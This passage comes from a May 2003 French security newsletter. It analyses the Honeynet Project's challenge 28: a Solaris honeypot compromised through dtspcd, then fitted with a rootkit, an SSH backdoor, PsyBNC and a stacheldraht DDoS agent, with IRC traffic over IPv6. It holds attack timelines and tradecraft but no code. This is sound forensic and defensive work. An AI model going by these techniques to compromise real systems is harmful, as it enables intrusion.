‘ShellCode’ sous l’autorité de ‘root’ et ouvrir un shell interactif sur le port ‘TCP/1534’. Cet accès lui permet de
télécharger les outils nécessaires ainsi qu’un ‘rootkit’.
Après exécution de ce dernier, les utilitaires d’administration sont remplacés par une version permettant de
masquer la compromission, une porte dérobée SSH est activée sur le port ‘TCP/5001’, un processus de relayage
IRC (PsyBNC) est installé dans une version obsolète mais pré-compilée pour le système cible et enfin, un outil de
déni de service distribué est activé en lieu et place du service ‘dtspcd’. On notera que les correctifs nécessaires
pour sécuriser le système sont automatiquement installés refermant ainsi la (les) brèche(s) permettant de prendre
le contrôle du système. L’attaquant est désormais sûr d’avoir le plein contrôle du système et d’être seul maître à
bord.
Après avoir papoté quelques jours sur un canal dédié d’un réseau ‘IRC’ underground, l’attaquant décide d’essayer
d’utiliser les services d’un nouveau réseau ‘IRC’ accessible en IP V6. Pour cela, il utilise la porte dérobé SSH
installé le premier jour et télécharge la dernière version du proxy ‘IRC’ ainsi que la pile IP V6. Après avoir
réinitialisé le système, il configure le proxy via la porte dérobée ‘SSH’ puis tente avec succès une connexion IP V6
sur le nouveau réseau ‘IRC’.
3. Quels ont été les systèmes utilisés durant l’attaque et comment ?
Nous proposons au lecteur de se reporter aux tableaux présentés dans les différentes conclusions intermédiaires.
4. Pouvez-vous mettre en évidence les différentes séquences de l’attaque par un diagramme ?
Les séquences engagées le premier jour sont récapitulées sur le synoptique suivant:
61.219.90.180
80.17.14.44
192.168.100.28
62.211.66.16
62.211.66.53
61.134.3.11
217.117.38.10
irc1.stealth.net
sun.com
Vuln. ‘dtspcd’
Accès Shell TCP/1524
Accès ‘shell’
Acquisition outils
Acquisition rootkit
Verrouillage accès
FTP utilitaires ‘wget’, ‘dlp’, ‘solbnc’, ‘ipv6sun’
HTTP rootkit ‘sol.tar.gz’
FTP patches SUN
Initialisation Proxy IRC
Annonce ICMP
Protocole ‘stacheldraht’
Activité IRC
Accès Proxy TCP/7000
Papotages divers et variés
Session IRC TCP/5555
Les séquences engagées le troisième jour sont récapitulées sur le synoptique suivant:
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 63/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
62.101.108.86
80.17.14.222
192.168.100.28 javairc.tiscali.it
62.211.66.65
Activité IRC
Accès Proxy TCP/7000
Papotages divers et variés
61.134.3.11
irc1.stealth.net
217.117.38.10
irc6.ediso
tel.it
Session IRC TCP/5555
Annonces ICMP
Protocole ‘stacheldraht’
Sondage TCP/UDP
Accès SSH
Porte dérobée SSH TCP/5001
HTTP proxy IRC ‘psyBNC’
Installation Proxy IRC / Module IPV6
Reboot du système
Accès SSH
Porte dérobée SSH TCP/5001
Configuration / Lancement proxy
Activité IRC
Accès Proxy TCP/7000
Papotages divers et variés
Session IRC IP V6
5. Quel est le rôle des paquets ICMP contenant la chaîne ‘skillz’ ?
Le protocole de communication entre les agents ‘stacheldraht’ et leurs contrôleurs utilise des paquets ‘ICMP’ de
type ‘Echo Reply’. La chaîne contenue dans ceux-ci est significative de l’état de la session.
Pour en savoir plus, nous recommandons la lecture de l’analyse de l’outil ‘stacheldraht’ proposée par David
Dittrich sur la page ‘http://staff.washington.edu/dittrich/misc/stacheldraht.analysis’.
6. Pouvez-vous identifier le protocole non IP activé par l’attaquant et déterminer son utilisation ?
L’attaquant a activé le protocole IP V6 sur la machine compromise rendant l’analyse plus complexe pour qui ne
dispose pas des outils ad’hoc. Il s’agit a priori d’un simple test de la part de l’attaquant visiblement intéressé par
les possibilités offertes par les réseaux ‘IRC’ IP V6.
7. Pouvez-vous identifier la nationalité de l’attaquant ?
Nous penchons pour une origine ‘Italienne’ malgré l’existence d’éléments pouvant laisser envisager une origine
chinoise (certains serveurs utilisés sont localisé en Chine), roumaine (le ‘rootkit’ est une variation d’un outil
d’attaque développé en Roumanie) ou hongroise (l’un des sites contrôleurs ‘stacheldraht’ est localise en Hongrie).
La lecture des conversations sur ‘IRC’ enlève le dernier doute …
8. Quelle est l’implication de l’utilisation d’un protocole non IP sur les technologies IDS ?
Le déploiement de plus en plus fréquent de réseaux IP version 6, et des services associés, va conduire les éditeurs
de produits IDS à mettre sur le marché des outils susceptibles de collecter et d’analyser les événements et
données transmises sur les deux supports : IP Version 4 et Version 6.
9. Quel outil existant peut être employé pour décoder ce protocole?
Les excellents outils ‘tcpdump’ et ‘Ethereal’ disposent des décodeurs ad’hoc et permettent l’analyse en temps
réel ou différé des flux échangés sur IP Version 6. Rappelons à ce propos que les systèmes d’exploitation HP-UX et
AIX intègrent une pile protocolaire IP V6 native depuis maintenant plusieurs années.
Conclusion
On retiendra de ce défi les trois points suivants:
- L’importance du service ‘IRC’ – et des réseaux non officiels - comme moyen d’information de l’attaquant mais aussi
comme support d’attaque. La surveillance permanente de ces réseaux permettrait d’être immédiatement informé des
derniers événements. Cette mesure reste hélas très difficilement réalisable de par la complexité des infrastructures
sous-jacentes et le nombre de réseaux existants. S’il peut être envisagé d’infiltrer un réseau à la suite de la
compromission d’un système (cf. défi N°27 du mois dernier), il paraît particulièrement difficile d’infiltrer la totalité
des réseaux sauf à disposer d’accès spécifiques sur les principaux nœuds de communication de l’Internet. L’absence
de tout outil d’aide à la présentation des conversations acquises rend par ailleurs le travail d’analyse fastidieux et …
quelquefois complexe.
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 64/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
- La problématique posée par l’utilisation de plus en plus fréquente par les pirates de protocoles assurant la
confidentialité des échanges au moyen d’un algorithme de chiffrement fort. La teneur des échanges ne peut plus être
analysée ni même identifiée par les systèmes de détection d’intrusion.
- La problématique posée par l’existence de la version 6 du protocole IP qui, si celle-ci est généralement ignorée des
utilisateurs finaux de l’Internet, n’en reste pas moins la version désormais utilisée dans les infrastructures centrales
– les backbones – de l’Internet.
Et pour conclure, nous laissons au lecteur le soin d’imaginer la complexité de l’analyse si le système compromis avait
été plus actif. En ce sens, les défis proposés par le projet ‘HoneyNet’ peuvent conduire à une fausse impression de
facilité alors que ceux-ci ne portent que sur des systèmes peu actifs sur lesquels la majorité des événements
journalisés correspondent aux faits et gestes de l’attaquant ….
# Complément d'information
http://project.honeynet.org/scans/scan28/
http://www.graffiti.com/services
http://linuxgov.freehomepage.com/catalog.html
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
- Fichiers /etc/services à jour
- Présentation de ‘PsyBNC’, site probable de l’attaquant
Page 65/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE

Documents pareils

Veille Technologique Sécurité

Veille Technologique Sécurité est répréhensible au titre de la Loi Française.

Plus en détail

Veille Technologique Sécurité

Veille Technologique Sécurité Site susceptible d’héberger des informations ou des programmes dont l’utilisation est répréhensible au titre de la Loi Française.

Plus en détail